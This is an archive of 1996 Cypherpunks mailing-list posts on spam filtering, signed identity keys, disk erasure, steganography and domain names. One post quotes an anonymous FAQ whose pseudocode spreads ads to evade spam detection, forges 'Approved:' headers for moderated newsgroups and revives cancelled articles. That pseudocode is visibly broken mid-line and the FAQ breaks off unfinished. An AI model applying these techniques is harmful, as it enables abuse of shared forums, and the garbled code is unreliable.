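Only the correctly signed, in-scope notice takes effect; forged, altered, out-of-scope and unknown-issuer notices are ignored, so a notice cannot be used to hide articles on behalf of an issuer the reader trusts.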
From wombat at mcfeely.bsfs.org Fri Sep 13 22:49:55 1996 From: wombat at mcfeely.bsfs.org (Rabid Wombat) Date: Sat, 14 Sep 1996 13:49:55 +0800 Subject: Internet Drivers' Licenses In-Reply-To: Message-ID: Well, it would seem some are helping to make my point; M.Duvos is calling for government intervention, in the form of an "Internet Driver's License." There goes anonymity, which has, in general, been a "good thing" on the 'net. Here comes "big brother", to protect us from the evil anonymous spammer. Here comes more government infrastructure to enforce the LAWS that "we", as a society, have subjected ourselves to, so that "the few, the rude, the clueless" can no longer send out their anonymously sourced spam. Less freedom, more taxes. Why? Because someone out there is doing something because they "have the right", by the sole virtue of there currently being no law specifically against their particular behavior. Still on the side of the spammer, Mr. May? On Fri, 13 Sep 1996, Black Unicorn wrote: > On Fri, 13 Sep 1996, Mike Duvos wrote: > > > Bill Stewart writes: > > > > > Anybody for an Internet Driver's License? > > [Too much spam, some designed to avoid filtering by humans or machines] > > > Just being able to filter out posts from Net addresses that > > don't correspond to real identifiable humans posting under > > their legal names would be a good first step. > Am I not an identifiable human? Is Black Unicorn an AI? Would I be acceptable if I posted as JohnSmith at mcfeely.bsfs.org? > In any event, getting reputation credentials from a decentralized "web of > trust" is a much more efficient answer, especially where you can assign > your own levels of trust to each signator. > > Mr. Duvos' idea is, in my view, a step backwards. If you consider increased legislation a step backwards. How else can we determine what we, as free people, can/can't/should/shouldn't do?
(Sarcasm) Of course it is a step backwards; the ability to discuss sensitive issues, and obtain information anonymously has been of great social benefit. Yet another freedom soon to be legislated away (See "Georgia, USA"). Still failing to see the cause-and-effect relationship, folks? When even some on c'punk readers are calling for mandatory identification, where do you think the great unwashed position themselves? - r.w. From wombat at mcfeely.bsfs.org Fri Sep 13 22:59:23 1996 From: wombat at mcfeely.bsfs.org (Rabid Wombat) Date: Sat, 14 Sep 1996 13:59:23 +0800 Subject: Internet Drivers' Licenses In-Reply-To: Message-ID: On Fri, 13 Sep 1996, Dr.Dimitri Vulis KOTM wrote: > If the situation with junk e-mail becomes much worse than it is now, > then I think we'll end up with the following scenario: > > 1. A spammer gets my name, Igor Chudov's name, and a bunch of other names > from our Usenet postings. > > 2. The spammer e-mails each one of us, offering to buy X-rated videos. > > 3. Igor Chudov reads the spam e-mail first and somehow informs my mail-sorting > 'bot that this e-mail should be junked. > > 4. If my 'bot sees the spammer's mail, it junks it. > > And I'd do the same for him if I saw it first. :-) Naturally the warning about > junk e-mail needs to be digitally signed. I suppose they could be posted in a > specially designated Usenet newsgroup. The e-mail-sorting 'bot would check > this newsgroup for signed junk-mail notices from trusted parties and junk the > matching e-mails from the incoming queue. I guess it'd have to look at the > body of the mail and not just the headers, which are easy to vary. > > > > In any event, getting reputation credentials from a decentralized "web of > > trust" is a much more efficient answer, especially where you can assign > > your own levels of trust to each signator. Nice concept, but it isn't that hard to slightly alter each message; now you've also got to determine which are "the same" messages, and which are not.
Why would the headers be easier to vary than the body? Tack a few extra one-liner pieces of ad copy on the end in pseudo-random order, and you've got "different" messages. How do you view this specially designed newsgroup as working? Will you need to fetch all notices on a regular basis, and use the "warnings" to sort your mail? Seems like it would take longer to alter your trust level of third parties than it would take for your "opponent" to crank up another aol trial disk ... Looks like a lot of work ahead. :) - r.w. From dlv at bwalk.dm.com Fri Sep 13 23:08:46 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sat, 14 Sep 1996 14:08:46 +0800 Subject: Internet Drivers' Licenses In-Reply-To: Message-ID: Black Unicorn writes: > Seriously, what is the import of the "real identifiable human" or the > "posting under their legal names" point? I'm sure certain parties out there would like that. > If an AI program posts quality stuff, what's the difference? Indeed, an AI program I wrote has been posting excellent stuff in alt.sci.physics.plutonium - check it out! :-) > Why the import of true "legal" names? Why not simply develop reputation > signatures? Right now I let all my incoming e-mail collect in one queue. If I were really bothered by junk e-mail, I'd set up some sort of filtering that would sort them into three classes by originator: to be deleted without reading to be read as soon as possible to be read at my leisure the default, for unknown originators, would be to be read at my leisure. > What your suggestion basically says is "instead of developing our own > decentralized reputations system for filtering lets use one already in > place, i.e. the state Department of Motor Vehicles. If the situation with junk e-mail becomes much worse than it is now, then I think we'll end up with the following scenario: 1. A spammer gets my name, Igor Chudov's name, and a bunch of other names from our Usenet postings. 2.
The spammer e-mails each one of us, offering to buy X-rated videos. 3. Igor Chudov reads the spam e-mail first and somehow informs my mail-sorting 'bot that this e-mail should be junked. 4. If my 'bot sees the spammer's mail, it junks it. And I'd do the same for him if I saw it first. :-) Naturally the warning about junk e-mail needs to be digitally signed. I suppose they could be posted in a specially designated Usenet newsgroup. The e-mail-sorting 'bot would check this newsgroup for signed junk-mail notices from trusted parties and junk the matching e-mails from the incoming queue. I guess it'd have to look at the body of the mail and not just the headers, which are easy to vary. This is the kind of project cypherpunks would do if they were writing code, instead of lies and personal attacks, the way Tim May (fart) does. > In any event, getting reputation credentials from a decentralized "web of > trust" is a much more efficient answer, especially where you can assign > your own levels of trust to each signator. Yes - take a look at the NoCeM project for Usenet at http://www.cm.org. Perhaps this technology can be adapted for rating e-mail. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From lspeidel at earthlink.net Fri Sep 13 23:24:48 1996 From: lspeidel at earthlink.net (zac) Date: Sat, 14 Sep 1996 14:24:48 +0800 Subject: No Subject Message-ID: <199609140428.VAA02592@iberia.it.earthlink.net> From loki at infonex.com Fri Sep 13 23:47:23 1996 From: loki at infonex.com (Lance Cottrell) Date: Sat, 14 Sep 1996 14:47:23 +0800 Subject: Nonsense, absolute nonsense... [Fwd: HipCrime and Spam] In-Reply-To: <199609131941.NAA15578@rintintin.Colorado.EDU> Message-ID: >>At 21:50 9/11/96, Ross Wright wrote to >>cypherpunks at toad.com and remailer-operators at c2.org: >>>As I said having a website invites comments. It's like being a >>>public figure. In effect you are publishing your e-mail address. 
>>
>>
>>Interesting perspective. However, placing an email address on a web page
>>is by no means an offer to take "comments" (i.e., marketing spams) on
>>anything that strikes the spammer's fancy.
>
>How would you know what the *intent* of these other people is in placing
>mailme: tags on their public pages unless you have been to the specific
>pages. You speak only for yourself, yet you try to imply that you speak for
>everyone on the www who has placed a mailto: tag on their pages.
>

I think this is exactly the point. On a given page I might have several mailto tags. One for comments on some subject, one for feedback, and one for the webmaster. I expect the person mailing me to take the time to use the correct mailbox.

I created a page urging political activism, and included a mailto for all the relevant Senators and Representatives. I hardly think they are interested in this kind of spam.

Trawling the web for every address you can find, then mailing them all seems very inappropriate.

-Lance

----------------------------------------------------------
Lance Cottrell loki at obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche
----------------------------------------------------------

From jf_avon at citenet.net Sat Sep 14 00:09:42 1996
From: jf_avon at citenet.net (Jean-Francois Avon)
Date: Sat, 14 Sep 1996 15:09:42 +0800
Subject: Nonsense, absolute nonsense... [Fwd: HipCrime and Spam]
Message-ID: <9609140531.AB04951@cti02.citenet.net>

On 13 Sep 96 at 13:37, Admin wrote:

>
> >Also, I charge $500 per message. I've always liked flat fees. :-)

> >------- Forwarded Message -------
> >At 21:50 9/11/96, Ross Wright wrote to
> >cypherpunks at toad.com and remailer-operators at c2.org:

> >Unsolicited advertising/promotional email proofread for
> >$500/message! Your sending such a message to me is an explicit
> >request for my services!

> Inane, off-thread, unsupported weak analogous attempts at reasoned
> argument received, but not read - simply deleted, for $1000/message.
> Sending OR posting the above to me or a Newsgroup that I may happen
> to read constitutes your accord and acceptance of the above
> contract. If I must read them, the fee is $2000/message.

Geeee... I am *truly* clueless with my 0.1 g of pure gold per e-mail deleted.

As of today, take notice, I'm increasing my rates to 2 ounces of 99.99+ pure gold per received and deleted e-mail.

jfa

Jean-Francois Avon, Montreal QC Canada
"One of these centuries, the brutes, private or public, who believe that they can rule their betters by force, will learn the lesson of what happens when brute force encounters mind and force." - Ragnar Danneskjold
PGP key at: http://w3.citenet.net/users/jf_avon
ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891

From azur at netcom.com Sat Sep 14 00:11:01 1996
From: azur at netcom.com (Steve Schear)
Date: Sat, 14 Sep 1996 15:11:01 +0800
Subject: Child Porn as Thoughtcrime
Message-ID:

What if someone combined images now generally considered pornographic under current U.S. law, with a pressing political message. For example, a nude pre-teen holding a picket sign saying "F*** Censorship." How would the courts separate the protected speech (content) from the sexual (context)?

PGP Fingerprint: FE 90 1A 95 9D EA 8D 61 81 2E CC A9 A4 4A FB A9
---------------------------------------------------------------------
Snoop Daty Data           | Internet: azur at netcom.com
Grinder                   | Voice: 1-702-655-2877
Sacred Cow Meat Co.       | Fax: 1-702-658-2673
7075 W. Gowan Road, #2148 |
Las Vegas, NV 89129       |
---------------------------------------------------------------------
Just say NO to prescription DRUGS.

From jf_avon at citenet.net Sat Sep 14 00:38:21 1996
From: jf_avon at citenet.net (Jean-Francois Avon)
Date: Sat, 14 Sep 1996 15:38:21 +0800
Subject: Internet Drivers' Licenses
Message-ID: <9609140557.AB05688@cti02.citenet.net>

On 13 Sep 96 at 22:51, Rabid Wombat wrote:

> When even some on c'punk readers are calling for mandatory
> identification, where do you think the great unwashed position
> themselves?

As Auric Goldfinger :) once said:

Once is happenstance...
Twice is coincidence...
The third time is enemy action!

jfa

Jean-Francois Avon, Montreal QC Canada
"One of these centuries, the brutes, private or public, who believe that they can rule their betters by force, will learn the lesson of what happens when brute force encounters mind and force." - Ragnar Danneskjold
PGP key at: http://w3.citenet.net/users/jf_avon
ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891

From mpd at netcom.com Sat Sep 14 01:21:07 1996
From: mpd at netcom.com (Mike Duvos)
Date: Sat, 14 Sep 1996 16:21:07 +0800
Subject: Internet Drivers' Licenses
Message-ID: <199609140644.XAA13526@netcom10.netcom.com>

Rabid Wombat writes:

> Well, it would seem some are helping to make my point;
> M.Duvos is calling for government intervention, in the form
> of an "Internet Driver's License."

Nothing to do with the government. If people choose to voluntarily obtain a key with which to voluntarily sign their posts, and I set my newsreader to present only articles which correspond to keys having certain criteria, all is well and good. Anyone can still post anything they like, including unsigned articles, and the filter is at the reading end, which is where it should be.

A given key could mean "I am Mike Duvos", "I am Tim May", or "I am Dorothy Denning."
Or it could mean something more obscure, like "I showed my driver's license to get this key", or "10 leading Cypherpunks think I'm a Nym worth listening to", or even "I donate regularly to the 700 Club."

> There goes anonymity, which has, in general, been a "good
> thing" on the 'net. Here comes "big brother", to protect us
> from the evil anonymous spammer.

Bullfeathers. Encouraging people to sign posts, and permitting newsreaders to select based on signature characteristics is about as big a threat to anonymity as a procmail file which filters out everything having an anon remailer disclaimer attached to it.

> Here comes more government infrastructure to enforce the
> LAWS that "we", as a society, have subjected ourselves to,
> so that "the few, the rude, the clueless" can no longer send
> out their anonymously sourced spam.

They can spam all they want. They can be as rude and clueless as they wish. It hardly requires additional government infrastructure if *I* want to only read posts signed by keys endorsed by persons or organizations I trust.

> Less freedom, more taxes.

How one moves from a system of voluntarily signing Usenet posts to more taxes is beyond my ability to comprehend.

--
Mike Duvos $ PGP 2.6 Public Key available $
mpd at netcom.com $ via Finger. $

From stewarts at ix.netcom.com Sat Sep 14 03:59:54 1996
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Sat, 14 Sep 1996 18:59:54 +0800
Subject: Erasing Disks
Message-ID: <199609140915.CAA28227@dfw-ix6.ix.netcom.com>

At 11:12 PM 9/11/96 -0700, you wrote:
>The paper starts with the comment that most secure data destruction guides
>are classified. There is the suspicion that the unclassified ones do not
>cover the newer recording materials and techniques, and will not protect
>you against government attackers.

I disagree. The methods for declassification in the Army and Defense Department security manuals included several approaches:

1) Physical destruction - acid, sandblasters, etc.
2) NSA-Approved Whopping Big Magnets
3) NSA-Approved Hopefully-Bugfree computer programs for some computers.

The most secure methods were the unclassified ones - after we sandblasted our RM05 disk packs, the NSA and KGB can't read anything.

The less secure methods are the ones that require NSA approval - how strong is a Whopping Big Magnet this year? (Too strong to put near MY computer lab, thank you! :-) The answer tells you something about what the NSA can crack, which they not only don't want known, they don't want to encourage the KGB to erase their own disks better or to use the knowledge to become better at reading stolen Yankee disks.

And NSA-Approved computer programs presumably have weaknesses and bugs, like all computer programs; they carry the risk that Reverse Engineers can figure out how to find the data the NSA missed.

But shredding the floppy? No need to classify that, no secrets leaked by saying "Yeah, if you dissolve the magnetic film in acid we can't read anything on the etch marks in the mylar." It's Dumb and Safe (as long as you do the paperwork to make sure that you know which magtapes were fed to the shredder, which ones were overwritten with other RILLY SEKRET DATA, and which ones were stolen by the Tape Drive Repair Truck driver.)

# Thanks; Bill
# Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com
#
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto

From stewarts at ix.netcom.com Sat Sep 14 04:17:00 1996
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Sat, 14 Sep 1996 19:17:00 +0800
Subject: really undetectable crypto
Message-ID: <199609140915.CAA28230@dfw-ix6.ix.netcom.com>

At 07:26 PM 9/12/96 -0700, Jim_Miller at bilbo.suite.com wrote:
>Most everybody on the list is familiar with the technique of hiding
>encrypted messages in the LSBs of image files. Personally, I would not
>use such a technique because I don't believe it's really undetectable.
>I assume, without proof, that the LSBs of image files have statistical
>properties that are sufficiently different from encrypted data that a
>clever person could determine whether or not an image file contained an
>imbedded encrypted message.

First of all, they should at most be able to tell that there are random-looking-noise bits in there - if they start seeing patterns of ------BEGIN PGP ENCRYPTED SECRET MESSAGE------ you haven't done your job, though there are more subtle patterns that are more annoying to hide, like the slight bias of an RSA-encrypted piece of data; Hal Finney and others have written about this in the past.

Hiding depends substantially on the image source and the compression methods, if any, used on the image. For instance, a 24-bit true-color image or 8-bit grey-scale image from a scanner with 6-bit resolution will be pretty noisy in the LSBs, and if the Bad Guys are clever enough to find the patterns in them, you can be clever enough to find them and encode your initially-pseudorandom cyphertext stegobits in a way that matches the stats of the noise. On the other hand, if you take the LSBs of cartoon data, with large areas of solid colors, and start dithering them with stegobits, it's obvious you're up to something, if not necessarily what it is - be careful.

Ron Rivest posted a message on coderpunks mentioning somebody's suggestion of building an internet-phone sort of program that shoves stegobits into the voice compression. I'd be extremely surprised if you could do that with the fancier compression algorithms, such as CELP, LPC, and friends, but it shouldn't be too hard with the looser compression algorithms such as ADPCM and Delta-Modulation, which need 16-32kbps and can run on really dumb processors - you've got more bits per second to hide in, can get away with stealing more of them, and there isn't any real subtle prediction stuff going on that you've got to work around.
Given that most of the popular Internet Phone products don't do encryption (sigh...), this would at least be a good cover. (Well, assuming you've got a credible voice conversation going and aren't saying things like "OK, Carlos, let me send you the secret message starting ... NOW".)

[tricks #1,2 - picking your cleartext so the RC4/40 cyphertext or MD5s have chunks of the real stego-cyphertext you want - cute.]

# Thanks; Bill
# Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com
#
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto

From stewarts at ix.netcom.com Sat Sep 14 04:20:00 1996
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Sat, 14 Sep 1996 19:20:00 +0800
Subject: Juno Newbies are Great!
Message-ID: <199609140915.CAA28224@dfw-ix6.ix.netcom.com>

OK, there are lots of spammers, clueless newbies, and wannabes there. There are some cool things about Juno

- it's free. Anybody can get on it. Easily. Anonymously, more or less, since they don't need to have your whole credit history to be able to charge you money. At most you need a maildrop.
- it's free. Anybody can get on it. Without a government. Without a bureaucracy from Washington who are Here To Help Us Provide Universal Access to the Nationalist Infotainment Infrastructure. Without telling us how to run _our_ systems.
- it's free. Anybody can get on it. Anybody can try to compete. There aren't any subsidies, so there aren't any rules, except the usual "make sure you've got positive cash flow soon" and "reputation capital can sell lots of stock."
- it's free. Nobody has to be on it. If you don't like the management, you can bail, with minimal investments, and go find better.
- it's free. Nobody has to be on it, unlike a government-run NII that you need to pay your taxes, do your banking, register cars, keep your draft card up to date and your papers in order, and can get thrown off if they suspend your Internet Driver's License for six months.
- it's free.
_I_ don't have to pay for it if I don't want it.
- it's free. Any newbie, spammer, or 3133T D00D can get on it, act as stupid as they want, and it's ok, because the public knows (or will soon enough) that clueless people live there and not to take any email from juno.com too seriously - it's not like mail from whitehouse.gov or kremvax.su or cnn.com that you know you'd better read and believe every word of. It's as accurate as the National Enquirer, it's the Net Of A Million Lies, and like Television, nothing to panic over.

So, like, relax, chill out, and get procmail or BozoWatch or some other filter, and you not only can get rid of most of the junobots, you can use it to get rid of lots of other spam, and use that new Distributed Reputation Service Platform that Anon at juno.com is developing to find the interesting 100 messages per day of the 1000 you receive.

# Thanks; Bill
# Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com
#
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto

From stewarts at ix.netcom.com Sat Sep 14 04:34:26 1996
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Sat, 14 Sep 1996 19:34:26 +0800
Subject: Domain names - Alternic - Authority
Message-ID: <199609140915.CAA28221@dfw-ix6.ix.netcom.com>

(The Top-Level Domain Name Wars have been breaking out in Cyberia-L, not a usual place for technical discussion, plus popping up and down in Cypherpunks. Hope y'all don't mind me mixing this to both.)

Back when domain names first came in, a number of us didn't believe that a centralized organization could pull it off, especially when it was being done by a collaboration of the US military types and the European Phone Companies, who were well known to be clueless. The email world wasn't just the ARPAnet, it included all of UUCP-land, PCs were starting to occupy their spaces, and there were various DECish things and Berknets and other radically non-conformable architectures and overlapping namespaces.
UUCPland worked because a few dedicated people, mainly at Bell Labs and some universities, with lots of time and non-beancounted-non-billed funds, kept track of where machines lived, phone-polled sites that couldn't afford it, tried to keep track of which of the umpty-seven machines named "bilbo" or "mozart" could talk to which others so you could occasionally get mail to someone who lived at ucbvax!allegra!mozart!zorro!bilbo!gandalf and know it was the same bilbo!gandalf you'd talked to last week and maybe get mail to people reliably across complex paths. Pathalias was a cool program that took link data and Dijkstra'd it together into a relatively connected bunch of shortest paths.

The idea that Somebody Thought They Were In Charge was annoying to many of us, especially Somebody Bureaucratic. Peter Honeyman set up a bunch of his machines as the .FUN domain for a while; it was run by fun people. Rob Pike and Ken Thompson later wrote a marvelous technical rant called "The Hideous Name" about how locally-based addressing makes far more sense than global - it both reflects reality and lets the decisions about naming and such be made by the people and processes that need to make them.

Well, domain names eventually became a raving success, just because it was so much easier to say where someone was (administratively, if not physically) than to guess how to get there hop-by-hop. Separating administrative addresses from routing was an important mental step. Stuff like .BITNET and .CSNET were workable, .UUCP had its real problems but eventually became sort-of-defined relative to uunet, a machine set up as a research project that had turned into a small business.
One of the things that made it work well was that any given machine only had to know a manageable amount of stuff - you needed your own subdomains, a path to the top of your organization, a way to recognize that given patterns were high-level domains, and a path to the Root Servers - plus you needed somebody Higher Up to enter your name and address in their administrative database so other people could find you. It's easy to find where to look among a few hundred entries (a few technically-cooperative countries, a few zones for non-countries, and a few hundred countries that didn't really have email :-) Occasionally a country comes on board that your internal nameservers didn't recognize, and you need to get your administrator to add .nl or .kr or whatever.

From that relatively short list, which you don't need any blazingly complex database to administer, you can get anywhere. The standard DNS BIND tries to solve a bunch of complex _local_ problems and work portably in many different environments, but doesn't need to be tuned blazingly complexly to work almost anywhere. The systems that need to go beyond that are the servers for .com and to some extent .edu, which have to keep track of a lot more sites, and places that have complex internal structures or are trying to solve fancy problems like mobile users. But www.joesgarage.com doesn't need to do most of that.

I think polluting the top-level domain name space is a bad move. While geographically-based names aren't a great choice for representing non-small organizations, they're short, and if you open up the entire top-level you just complicate everyone's life and in a year or two you'll have as many people carving out space at the toplevel as you currently have in .com, raising the ego levels without making the name space any bigger.

Now, I suppose there's a certain nice philosophical position of being able to say "You're .gov.fr - we're .microsoft, and we're at a higher level than you!"
or "You're .gov.uk - we're .gov.AnTir, and everybody in _our_ kingdom is there because they want to be!"

# Thanks; Bill
# Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com
#
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto

From bygg at sunet.se Sat Sep 14 06:50:03 1996
From: bygg at sunet.se (Johnny Eriksson)
Date: Sat, 14 Sep 1996 21:50:03 +0800
Subject: Internet Drivers' Licenses
Message-ID:

Mike Duvos writes:

> I am now getting more junk email than email from people I
> care to correspond with. It seems one can't even read the
> scholarly newsgroups anymore without "Come Watch Us Lick
> Ourselves on the Web" messages popping up regularly.

How inappropriate. Such messages belong in rec.pets.cats.

--Johnny

From dlv at bwalk.dm.com Sat Sep 14 09:11:51 1996
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 15 Sep 1996 00:11:51 +0800
Subject: Internet Drivers' Licenses
In-Reply-To:
Message-ID:

Rabid Wombat writes:
> Well, it would seem some are helping to make my point; M.Duvos is calling
> for government intervention, in the form of an "Internet Driver's License."

It does not have to be the gubment. It could be a web of trust - like protocol. E.g. M.Duvos gives a pile of non-reusable, revokable cookies to people from whom he wants to receive e-mail. Every time one of them sends him an e-mail, he uses up one of his cookies. If he doesn't give me any cookies, and I want to e-mail him, I have to negotiate with someone who has a cookie and get one. Not sure how this would work with mailing lists...

> There goes anonymity, which has, in general, been a "good thing" on the
> 'net. Here comes "big brother", to protect us from the evil anonymous
> spammer. Here comes more government infrastructure to enforce the LAWS
> that "we", as a society, have subjected ourselves to, so that "the few,
> the rude, the clueless" can no longer send out their anonymously sourced
> spam. Less freedom, more taxes. Why? Because someone out there is doing
> something because they "have the right", by the sole virtue of there
> currently being no law specifically against their particular behavior.

Folks who "fight spam" by forging cancels for any Usenet articles they don't like are no better than an oppressive government. The infrastructure they've created for efficiently suppressing any information they don't want to be on Usenet can now be used by any government that wants to remove objectionable material from Usenet.

> Still on the side of the spammer, Mr. May?

The old fart is a spammer.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps

From dlv at bwalk.dm.com Sat Sep 14 09:33:41 1996
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 15 Sep 1996 00:33:41 +0800
Subject: Internet Drivers' Licenses
In-Reply-To: <199609140644.XAA13526@netcom10.netcom.com>
Message-ID:

mpd at netcom.com (Mike Duvos) writes:
> A given key could mean "I am Mike Duvos", "I am Tim May", or "I

Fart.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps

From dlv at bwalk.dm.com Sat Sep 14 10:07:11 1996
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 15 Sep 1996 01:07:11 +0800
Subject: Internet Drivers' Licenses
In-Reply-To:
Message-ID:

Rabid Wombat writes:
> (fart) H??? Kook of the Hour?

> Nice concept, but it isn't that hard to slightly alter each message; now
> you've also got to determine which are "the same" messages,and which are
> not. Why would the headers be easier to vary than the body? Tack a few
> extra one-liner pieces of ad copy on the end in pseudo-random order, and
> you've got "different" messages.

Consider the spam currently found on Usenet. Most multi-posters repeat exactly the same text, and post it alphabetically once in each newsgroup. That's what Canter&Siegel did originally, and that's what they recommended in their book (which by the way I highly recommend).
I remember a couple of incidents before C&S when someone forged an article from "B1FF" in every newsgroup, and someone posted a warning about the second cumming of Christ in every newsgroup, and they were mildly annoying, but didn't break anything. During the C&S incident the traffic problems (Australia kicked off the net et al) were caused not by the C&S spam itself, but by the multitude of ineptly forged cancels. But I'm digressing...

In every e-mail spam I've seen so far, the bodies of all the e-mails in the single spam are identical. To combat it, a trusted party could simply post the body, and the readers who trust him would discard incoming e-mails that match the body.

I'm certain, however, that the spamming technology will improve. I attach at the end an interesting article that appeared anonymously about a year ago, explaining how one can multi-post essentially the same message while varying the text.

> How do you view this specially designed newsgroup as working? Will you
> need to fetch all notices on a regular basis, and use the "warnings" to
> sort your mail? Seems like it would take longer to alter your trust level
> of third parties than it would take for your "opponent" to crank up
> another aol trial disk ...

The way I envision this system (and I don't think we really need this yet) is: a trusted party (there may be more than one of them) posts templates saying something like:

'don't compare after \n--' (randomized signature);
'contains the string CHAG ratings in the body 3 times';
'contains the string Received: from interramp.com in the headers once'.

A reader who wants to update his database of e-mail that needs to be junked would run a program that would

1) get new articles in the filter notices newsgroup
2) look for articles digitally signed by the "raters" trusted by this reader
3) add their templates to this reader's mail filtering rules

Then when the reader filters his incoming e-mail, he won't see the junk e-mail that matches the rules.
Of course if the rater posts templates that are "too general" and rejects non-junk e-mail, the readers won't trust his notices anymore.

If the junk mail makes it through to a reader because the template for it hasn't yet been posted, the reader can forward it to the rater and ask him to post a template for it for other readers' benefit.

Here's the old anonymous article on how to spam better:

]Subject: FAQ for Usenet Advertisers: Use Mathematical Algorithm to Avoid "Spam"
]
]Q-0. Introduction
]
]This mathematical advice is posted as an academic research study and is not a
]solicitation to act. It is a technical note and contains numerous mathematical
]algorithms and portions of pseudo-code. If you are not familiar with the
]intricacies of RFC 1036, you can ask a friendly techie to help implement these
]algorithms in a computer programming language, such as PERL. For example, the
]headers of your ad should contain the header "Approved: " to assure
]proper propagation in the so-called "moderated" newsgroups, but the techniques
]for inserting it are outside the scope of this article.
]
]Certain self-appointed "net-judges" keep trying to suppress the public
]dissemination of knowledge on how Usenet works (available from RFC 1036 and
]other publicly accessible documents). They rely on "security through obscurity"
]to protect their economic interests and harass honest Usenet entrepreneurs so
]as to keep the advertising pie all to themselves. Hence the need for anonymity.
]
]Q-1. Can I post a separate copy of my ad into each target newsgroup in
]the alphabetical order?
]
]No! That would be "spamming".
]
]Spamming is commonly defined as excessive posting of multiple, separate copies
]of identical messages to many newsgroups, one right after the other, without
]using the standard method of cross-posting, described in this article. Since
]it's really not that difficult to write a program that will post the same
]advertisement to dozens, if not hundreds of thousands of newsgroups, a lot of
]people have taken to doing this. People usually spam as a means of flooding
]Usenet with messages about a product or service that they want to sell,
]although they can spam for other reasons. Spamming Usenet is a BAD THING to do.
]DON'T DO IT. Follow the instructions in this article to advertise WITHOUT spam.
]
]Consider the old-fashioned way of spamming Usenet with ads. Let G be the list
]of all the relevant newsgroups where you want to post your ad. Let NG be the
]number of such newsgroups. We will refer to individual newsgroups as G[0]
]through G[NG-1].
]
]Remember once and for all: it's a very bad idea to run the equivalent of:
]
]for i=0 to NG-1 step 1 do (1)
]    post ad to G[i];
]
]This is SPAM. You can do better than that. But what happens if you just spam?
]
]First, some self-appointed net.cops, "vigilantes", or "net judges" will get
]upset if you post into every newsgroup in alphabetical order. Naturally, you
]couldn't care less if you hurt their feelings, but some of these vigilantes
]might go as far as impersonate you and "forge" a control article, making it
]look like you yourself are asking every computer on the network to delete your
]ad! This is illegal, but happens all too often.
]
]It is a major waste of Usenet resources to post your ad to one newsgroup at a
]time, without cross-posting. Please don't do it. On the other hand, if your
]"Newsgroups:" header is too long, it may break some Usenet newsreaders. Let NC
]be the number of newsgroups you will cross-post to at one time. Make sure your
]NC is never greater than 20, or else the self-appointed net.cops or "judges"
]will call your ad "velveeta" (spread into too many newsgroups) and forge
]cancels for it. In the pseudo-code below NC actually varies between 8 and 12.
]Section Q-2 explains what to do when NG is greater than NC.
]
]Second, some of the newsgroups on your list may have poor propagation. When you
]post your ad to them, they won't reach every other site on Usenet unless you
]cross-post the same ad to better propagated groups. After you've composed the
]list of newsgroups into which you want to post your announcement, separate them
]into two lists: the well-propagated newsgroups known at every site (like
]"sci.important.announce") and the poorly propagated ones (like "ca.spam.misc").
]Let NW be the number of well-propagated groups. Let NP be the number of poorly
]propagated groups. You'll probably have them listed in alphabetical order, but
]we'll see how to fix that. Let R be the integer part of NP/NW. You will cross-
]post to one newsgroup from the P list for every R newsgroups from the W list.
]
]Now you are going to go through the lists W and P and make sure that you cover
]each newsgroup. If you pick newsgroups from G at random, you will definitely
]miss a few and hit a few more than once. That would be a waste of Usenet
]resources, which you want to avoid. Instead, let SW be a random number
]relatively prime to NW. Recall Euclid's algorithm for computing the greatest
]common divisor of two integers m, n, such that n>m:
]
]do {
]    g=m;
]    m=n%m;
]    n=g;
]    } while (m);
]
]We now rewrite loop (1) as:
]
]i=SW; (2)
]do {
]    post ad to G[i];
]    i=(i+SW) % NW; /* where % denotes the remainder */
]    } while (i!=SW);
]
]Note: the remainder is denoted "mod" in some computer programming languages.
]
]It is easy to see that this loop will cover every newsgroup in G exactly once,
]but not in any kind of alphabetical order. However you still want to cross-post
]your ad to both the W list and the P list. Here is the complete pseudo-code:
]
]/* choose the step for loop (2) */
]let SW=NW/3+random(NW/3) /* random number between NW/3 and 2*NW/3 */
]while (GCD(SW,NW)<>1) ++SW; /* relatively prime to NW */
]
]let SP=NP/3+random(NP/3) /* likewise, random number between NP/3 and 2*NP/3 */
]while (GCD(SP,NP)<>1) ++SP;
]
]done=false;
]NR=0; /* when it reaches R, we take a newsgroup from the P list */
]i=j=0; /* control variables for the loops on W and P */
]do {
]    L=""; /* random number of groups to cross-post to */
]    for (NC=8+random(5); NC>0; --NC) {
]    if (NR say something like <123buy-my-widgets at your.site>.
]Make sure all message-ids are distinct and "legal".
]
]Ability to revive articles for which someone else has forged a cancel.
]
]Suppose you have posted article A1..An with message-id's M1..Mn.
]Save this information in a database. On a fast computer you could use
]PERL's associate list, with
]Mi's used as an index and Ai's being the info you've fed to NNTP, including
]article's body and the relevant headers, like the list of newsgroups it was
]posted to.
]
]Now have a program monitor your control newsgroup and whenever it sees
]an incoming article with a "Control: M" header, check if M is equal to some Mi
]in your associate list. If it is, then:
]
